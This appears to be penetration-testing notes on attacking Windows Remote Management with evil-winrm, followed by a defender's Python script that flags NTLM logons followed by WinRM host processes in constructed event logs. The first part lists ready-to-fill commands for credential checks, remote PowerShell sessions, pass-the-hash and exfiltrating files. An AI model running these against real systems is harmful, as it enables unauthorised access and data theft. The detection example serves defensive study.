5985/5986 - Evil-winrm

My personal favorite

  1. Check: crackmapexec --verbose winrm <IP> -u <username> -p <password>

  2. Try both ports: evil-winrm -i <IP> -u <username> -p <password> -P <port>

  3. PowerShell session: evil-winrm -i <IP> -u <username> -p <password>

  4. Pass the hash (NTLM): evil-winrm -i <IP> -u <username> -H <hash>

  5. Exfil data using Evil-winrm: download <File to be exfiltrated location> <Local location where it should be exfiltrated>
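
Defender's view of steps 3 and 4, as an added example that is not part of the original notes: an NTLM network logon followed by `wsmprovhost.exe` (the WinRM host process) in the same logon session is worth reviewing where Kerberos is the norm. Assumptions: events are simplified to dicts using field names from Security events 4624 and 4688, process-creation auditing is enabled, and the 4688 record carries the session's logon ID; all sample events are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample events (simplified dicts, not real log exports).
EVENTS = [
    {"EventID": 4624, "Time": "2024-05-01T10:00:00", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "svc_backup",
     "IpAddress": "10.0.0.50", "TargetLogonId": "0x5a1f0"},
    {"EventID": 4688, "Time": "2024-05-01T10:00:02",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "TargetLogonId": "0x5a1f0"},
    {"EventID": 4624, "Time": "2024-05-01T11:00:00", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "admin1",
     "IpAddress": "10.0.0.10", "TargetLogonId": "0x6b200"},
    {"EventID": 4688, "Time": "2024-05-01T11:00:01",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "TargetLogonId": "0x6b200"},
    # NTLM network logon with no WinRM host process (e.g. file share access).
    {"EventID": 4624, "Time": "2024-05-01T12:00:00", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "jdoe",
     "IpAddress": "10.0.0.77", "TargetLogonId": "0x7c300"},
]

def ntlm_winrm_sessions(events, window=timedelta(seconds=30)):
    """Return (user, source IP, logon ID) for NTLM network logons that are
    followed by wsmprovhost.exe in the same logon session within `window`."""
    logons, hits = {}, []
    for ev in sorted(events, key=lambda e: e["Time"]):
        ts = datetime.fromisoformat(ev["Time"])
        if (ev["EventID"] == 4624 and ev.get("LogonType") == 3
                and ev.get("AuthenticationPackageName", "").upper() == "NTLM"):
            logons[ev["TargetLogonId"].lower()] = (ts, ev)
        elif (ev["EventID"] == 4688 and
              ev.get("NewProcessName", "").lower().endswith("\\wsmprovhost.exe")):
            # Assumption: the session ID may sit in the Target or Subject field.
            for key in ("TargetLogonId", "SubjectLogonId"):
                match = logons.get(ev.get(key, "").lower())
                if match and ts - match[0] <= window:
                    lg = match[1]
                    hits.append((lg["TargetUserName"], lg["IpAddress"],
                                 lg["TargetLogonId"]))
                    break
    return hits

if __name__ == "__main__":
    for user, src, lid in ntlm_winrm_sessions(EVENTS):
        print(f"NTLM WinRM session: user={user} source={src} logon_id={lid}")
```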
